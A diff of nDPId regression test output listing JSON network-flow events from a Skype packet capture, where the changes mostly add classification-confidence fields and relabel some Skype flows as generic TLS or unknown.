 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
